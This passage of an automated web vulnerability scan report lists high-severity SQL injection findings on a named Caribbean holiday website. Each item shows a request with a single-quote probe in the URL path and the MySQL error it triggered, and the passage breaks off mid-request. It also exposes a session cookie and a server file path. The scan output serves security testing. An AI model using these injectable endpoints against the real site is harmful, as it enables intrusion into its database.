Date: Sat, 19 Mar 2011 01:56:09 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
1.91. http://www.caribbean-ocean.com/luxury%20Curacao%20holidays/305 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Curacao%20holidays/305

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Curacao%20holidays/305' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:56:14 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
1.92. http://www.caribbean-ocean.com/luxury%20Dominica%20holidays/111 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Dominica%20holidays/111

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Dominica%20holidays/111' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:56:22 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
1.93. http://www.caribbean-ocean.com/luxury%20Dominican%20Republic%20Resort%20holidays/302 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Dominican%20Republic%20Resort%20holidays/302

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Dominican%20Republic%20Resort%20holidays/302' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:56:30 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
1.94. http://www.caribbean-ocean.com/luxury%20Dutch%20Antilles%20Resort%20holidays/177 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Dutch%20Antilles%20Resort%20holidays/177

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Dutch%20Antilles%20Resort%20holidays/177' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:56:35 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
1.95. http://www.caribbean-ocean.com/luxury%20Grenada%20Resort%20holidays/107 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Grenada%20Resort%20holidays/107

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Grenada%20Resort%20holidays/107' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:56:36 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
1.96. http://www.caribbean-ocean.com/luxury%20Guadeloupe%20holidays/303 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Guadeloupe%20holidays/303

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Guadeloupe%20holidays/303' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:56:38 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
1.97. http://www.caribbean-ocean.com/luxury%20Haiti%20holidays/301 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Haiti%20holidays/301

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Haiti%20holidays/301' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:56:44 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
1.98. http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Jamaica%20Resort%20holidays/105

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Jamaica%20Resort%20holidays/105' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:56:53 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
1.99. http://www.caribbean-ocean.com/luxury%20Maldives%20Hotel%20holidays/12 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Maldives%20Hotel%20holidays/12

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Maldives%20Hotel%20holidays/12' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:57:01 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6887
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
1.100. http://www.caribbean-ocean.com/luxury%20Martinique%20Hotel%20holidays/304 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Martinique%20Hotel%20holidays/304

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Martinique%20Hotel%20holidays/304' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:57:05 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
1.101. http://www.caribbean-ocean.com/luxury%20Montserrat%20Hotel%20holidays/309 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Montserrat%20Hotel%20holidays/309

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Montserrat%20Hotel%20holidays/309' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:57:06 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
1.102. http://www.caribbean-ocean.com/luxury%20Saba%20holidays/312 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Saba%20holidays/312

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Saba%20holidays/312' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:57:07 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
1.103. http://www.caribbean-ocean.com/luxury%20Saint%20Barthelemy%20holidays/310 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Saint%20Barthelemy%20holidays/310

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Saint%20Barthelemy%20holidays/310' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:57:10 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
1.104. http://www.caribbean-ocean.com/luxury%20Saint%20Eustatius%20holidays/311 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Saint%20Eustatius%20holidays/311

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Saint%20Eustatius%20holidays/311' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:57:10 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
1.105. http://www.caribbean-ocean.com/luxury%20Saint%20Lucia%20Hotel%20holidays/99 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Saint%20Lucia%20Hotel%20holidays/99

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Saint%20Lucia%20Hotel%20holidays/99' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:57:13 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6887
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
1.106. http://www.caribbean-ocean.com/luxury%20St%20Barths%20Hotel%20holidays/113 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20St%20Barths%20Hotel%20holidays/113

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20St%20Barths%20Hotel%20holidays/113' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:57:15 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
1.107. http://www.caribbean-ocean.com/luxury%20St%20Kitts%20and%20Nevis%20holidays/110 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20St%20Kitts%20and%20Nevis%20holidays/110

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20St%20Kitts%20and%20Nevis%20holidays/110' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:57:23 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
1.108. http://www.caribbean-ocean.com/luxury%20St%20Martin%20Hotel%20holidays/255 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20St%20Martin%20Hotel%20holidays/255

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20St%20Martin%20Hotel%20holidays/255' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
